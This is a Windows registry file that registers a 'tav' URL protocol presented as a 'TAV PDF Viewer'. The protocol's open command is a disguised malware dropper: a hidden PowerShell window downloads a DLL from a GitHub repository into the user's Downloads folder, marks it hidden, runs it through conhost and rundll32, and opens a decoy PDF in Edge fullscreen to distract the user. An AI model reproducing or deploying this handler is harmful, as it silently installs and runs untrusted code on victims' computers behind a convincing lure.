Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\tav]
@="URL:TAV PDF Viewer"
"URL Protocol"=""


[HKEY_CURRENT_USER\Software\Classes\tav\shell]

[HKEY_CURRENT_USER\Software\Classes\tav\shell\open]

[HKEY_CURRENT_USER\Software\Classes\tav\shell\open\command]
@="powershell.exe -W Hidden -command \"$a=Join-Path $env:USERPROFILE Downloads;iwr -uri https://github.com/doe17409/tav-api/raw/refs/heads/main/llvmfunc.dll -o $a\\\\llvmfunc.dll;$b=Join-Path $a llvmfunc.dll;attrib +h $b;conhost conhost rundll32.exe $b,test; Start-Process msedge -ArgumentList 'https://ir.tav.aero/uploads/documents/Documents24042025185817_.pdf','--start-fullscreen'\""
